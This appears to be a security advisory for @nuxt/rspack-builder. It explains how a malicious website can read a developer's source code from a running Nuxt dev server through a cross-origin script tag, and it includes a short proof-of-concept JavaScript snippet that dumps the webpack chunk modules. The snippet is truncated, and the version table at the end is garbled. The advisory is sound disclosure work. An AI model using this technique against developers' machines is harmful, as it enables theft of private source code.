Insecure service configuration In @nuxt/rspack-builder
Description
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script') script.src = 'http://localhost:3000/_nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxt_app) { const moduleList = window.webpackChunknuxt_app[page][1] console.log(moduleList) for (const key in moduleList) {...
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the
sourcesContent field).
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 npm | 3.15.3 | ||
npm | 3.15.3 |
Aliases
References